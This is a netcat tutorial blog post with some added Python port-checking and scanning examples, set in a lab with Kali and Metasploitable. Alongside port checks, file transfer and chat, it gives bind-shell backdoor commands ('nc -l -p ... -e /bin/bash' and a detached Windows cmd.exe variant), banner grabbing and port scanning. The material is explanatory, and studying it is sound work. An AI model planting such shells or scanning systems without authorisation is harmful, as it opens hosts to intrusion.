
Can you ping a port?



This is one of the questions I hear most often during a SIEM implementation. Most (non-technical) people think that, just as we ‘ping’ an IP address, we can ping a port. That is not possible. So how can we actually check whether a port is reachable? There is a way, but before we get to it we need a few basics about what a port is and why we cannot ping it.

What is a port?

A port is simply a logical connection point where data is sent into and out of a system using the TCP/IP protocols. In simple words, a network port is the location where information is sent or received. While transferring data from A to B, a port is always associated with an IP address and a protocol (TCP or UDP), and together these identify both the source and the destination of a session. Port numbers run from 0 to 65535 and the ranges are separate for UDP and TCP. Ports 0 to 1024 are reserved for certain privileged services, for example 21 for FTP, 22 for SSH and 23 for Telnet.

What is a ping?

Most people don’t even know that the term ‘ping’ is an abbreviation of Packet InterNet Groper. It is a simple utility commonly used to verify whether a packet from one system can be sent across the network to a destination without errors. Ping works like radar or sonar: it sends a signal and waits for the reply, and the round-trip time of the signal is used to calculate the distance to the object. Instead of a signal, ping sends an ICMP Echo request (32 bytes on Windows, 64 bytes on Linux by default) and waits for the Echo reply. On receiving the echo reply it shows the round-trip delay and the TTL value. The ping utility is mainly used for checking network reachability.

So why can’t we ping a port?

All of us are familiar with the TCP and UDP protocols. ICMP is also a protocol, just like TCP and UDP. In the TCP/IP suite, ICMP, ARP, RARP, IGMP etc. fall under the internet layer. Applications like FTP, Telnet and SSH sit on top of the transport layer, in the application layer, and they are the ones associated with ports. These applications bind to ports in the application layer and then use TCP or UDP in the transport layer to send data. Hence they only respond when they receive a proper TCP or UDP request on their respective ports. That is why we can’t ping (ICMP) a port: an ICMP request only reaches the network layer, not the application layer above it.

How can we check accessibility to a port?

The only way to check whether you can reach a port is to send a proper TCP or UDP request to that port. If an application responds to the request, we can conclude that the port is accessible. A common way is to telnet to the port. But what I’ve seen across most clients is that they have policies on firewalls, desktops etc. that block telnet traffic. Their main concern is that telnet sends traffic over the network in clear text (not encrypted), so they have chosen SSH over telnet, which is a good, recommended practice. In this blog post I’m introducing a small, handy, portable tool known as NETCAT, which has more features than a typical telnet client.

The Netcat

Netcat is often called the Swiss Army Knife for hackers. It is a simple networking utility for reading from and writing to TCP and UDP sockets through an easy-to-use interface. It is very popular among system, network and security administrators because of its wide range of network debugging and investigation capabilities. Netcat can initiate TCP/UDP connections and send or receive TCP/UDP data. It can listen on any arbitrary TCP/UDP port, carry out port scanning, or even transfer data and files from one machine to another.
The main reason I chose netcat is that it stays running until either the source or the destination side closes the connection. Telnet can’t transfer arbitrary binary data, because certain characters are interpreted by the telnet application itself and then removed from the data stream. Telnet is incapable of listening for inbound connections, and it can’t use UDP either. Netcat, on the other hand, has none of these limitations; it is much faster and more convenient to use than telnet.
That’s enough theory; now let’s move on to how to use netcat.

For demonstration purposes I’m using 3 machines here:

  • Kali Linux: 192.168.146.131
  • Metasploitable Linux: 192.168.146.132
  • Windows 7: 192.168.146.1

Downloading Netcat

There are plenty of download links on the internet, but many of them are malware. Always download from trusted sources. I’m quoting a link below, if you want to download netcat.
If you have nmap installed, netcat is also installed along with it.

Checking out the port

I’ve got plenty of ports open on my Metasploitable Linux. My prime objective is to check whether port 2121 of Metasploitable is accessible or not.

#nc 192.168.146.132 2121

All you need to do is call netcat with nc followed by the IP address and the port number as arguments.


At first the firewall was blocking the port, so I got ‘connection refused’. Then I shut down the firewall and tried again. This time netcat gave me a neat response from the port, containing the application name, application version, the server’s OS and the server’s IP address.
There are lots of other features and uses of netcat. I’m adding a few below which I find very handy in some situations.

Banner Grabbing

Next is banner grabbing, a simple way to identify which version of web server a host is running. Simply connect to port 80 of the destination server, type a GET request and hit the Enter key twice.

#nc 192.168.146.132 80
GET / HTTP/1.0
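What “checking a port” means at the socket level, as an added example that is not part of the original post: a Python TCP connect (the same thing `nc HOST PORT` does) that tells ‘connection refused’ apart from a silent firewall drop, and reads either the service banner (the port 2121 case) or the reply to a GET request (the banner-grabbing case). The fake service, port numbers and banner text are constructed for the demo.

```python
import socket
import threading

OPEN, CLOSED, FILTERED = "open", "closed", "filtered"


def probe_port(host, port, probe=b"", timeout=2.0):
    """TCP-connect to host:port (what `nc HOST PORT` does), optionally send a
    probe such as an HTTP request, and return (state, first_reply_bytes).
    open = handshake done; closed = RST (nothing listening, or firewall REJECT);
    filtered = no answer before the timeout (typical of a firewall DROP)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            try:
                return OPEN, s.recv(4096)   # banner, or the reply to the probe
            except socket.timeout:
                return OPEN, b""            # listening, but waits for us to talk
    except ConnectionRefusedError:
        return CLOSED, b""
    except OSError:                         # connect timeout, unreachable, ...
        return FILTERED, b""


def start_fake_service(banner=b"", reply=b""):
    """Constructed local stand-in for a network service (not a real daemon):
    sends `banner` on connect and, if `reply` is set, answers the first thing
    the client sends with it. Returns the ephemeral 127.0.0.1 port it uses."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(banner)
                if reply and conn.recv(1024):
                    conn.sendall(reply)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def closed_port():
    """A port nothing listens on: bind an ephemeral one, then release it."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]
```

A firewall that REJECTs gives the immediate ‘closed’ the post describes, while one that DROPs only shows up as the timeout, which is why a short `-w` value matters when probing through one.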


Chat mode

This is how we run a simple chat session between two machines running netcat. It comes in very handy when you want to pass serial keys or configuration snippets to a colleague at the other end. One machine listens on a port first and waits for connections, just like a server; then the second machine connects to it. To quit the chat hit ‘ctrl+c’.

#nc -l -p 12345

l= listening mode
p= port
#nc 192.168.146.131 12345


File transfer mode

Another wonderful feature of netcat; this is helpful when you want to transfer a license key file, a configuration file or literally any sort of file. The setup may look a bit tricky but it is easy. First the destination should listen on a port and be ready to save the received contents into a file. Here my destination machine listens on port 12345 and writes anything it receives to out.file. A timeout of 3 seconds is given with the source-side command so that the transfer closes automatically after 3 seconds (assuming the file transfer completes in less than 3 seconds).
 
#nc -l -p 12345 > out.file

l= listening mode
p= port
The destination will begin listening on port 12345 and will save the contents to out.file.
On the source side we run,

#nc -w 3 192.168.146.132 12345 < out.file

w= timeout for connections (keeps connected only for 3 secs)

The source will copy the contents of ‘out.file’ and send them to port 12345 of the destination, 192.168.146.132.


Transfer with compression

This is used mainly to transfer huge files such as logs. The only difference is that here we call tar to bundle the files into an archive before sending them to the destination. Here I have asked netcat on the source to archive the Apache logs and serve them on port 12345, on demand. On the receiving end I asked netcat to connect to that port on the source and save the contents as a tar file.

#tar c /var/log/apache2 | nc -q 10 -l -p 12345

l= listening mode
p= port
q= quit after EOF (waits the given number of seconds after EOF on stdin, then quits)

#nc -w 10 192.168.146.132 12345 > log.tar

w= timeout for connections (keeps connected for 10 secs)

Backdoor

A simple method if you want to give someone temporary shell access. It is also called the backdoor method, since attackers plant netcat listening on a port so that they can get easy access whenever they want.

Linux

#nc -l -p 12345 -e /bin/bash

Opens a port and hands a Linux bash shell to whoever connects
l= listening mode
p= port
e= program to execute

#nc 192.168.146.132 12345

Netcat connects to the backdoor.


Windows

#nc.exe -l -p 12345 -e cmd.exe -d

l= listening mode
p= port
e= program to execute
d=detach from console or background mode

#nc 192.168.146.1 12345

Netcat connects to the backdoor.


Port Scanner

Netcat can also be used as a quick port scanner if necessary.

#nc -v -n -w 2 -z 192.168.146.132 1-1024

v= verbose mode
n= numeric IP only (no DNS resolution)
w= timeout for connections (waits at most 2 secs per port)
z= zero-I/O mode, used for scanning
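The scanner line above, reimplemented in Python as an added example (not from the original post) to show what -z and -w mean: only the TCP handshake is completed, nothing is sent, and each port waits at most the timeout. This version also probes ports concurrently, which the serial nc loop does not, so confirming which ports a host exposes after a firewall change takes one timeout rather than one per dropped port. The listeners and port numbers are constructed for the demo.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def port_is_open(host, port, timeout=2.0):
    """Zero-I/O check, like `nc -z -w TIMEOUT HOST PORT`: complete the TCP
    handshake and hang up without sending a byte. connect_ex returns 0 on
    success and an errno (refused, timed out, ...) otherwise, never raising."""
    with socket.socket() as s:
        s.settimeout(timeout)            # the -w value: per-port wait
        return s.connect_ex((host, port)) == 0


def scan(host, ports, timeout=2.0, workers=32):
    """Return the sorted list of open ports among `ports`. Ports are probed in
    parallel, so DROPped ports cost one timeout overall instead of one each."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, port_is_open(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def listen_on_ephemeral():
    """Constructed stand-in for a listening service (not a real daemon):
    returns (server_socket, port) bound on 127.0.0.1; close the socket to
    turn the port back into a closed one."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = listen_on_ephemeral()
    print(scan("127.0.0.1", range(port - 2, port + 3)))   # prints [port]
    srv.close()
```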


Please follow the link to see netcat in action
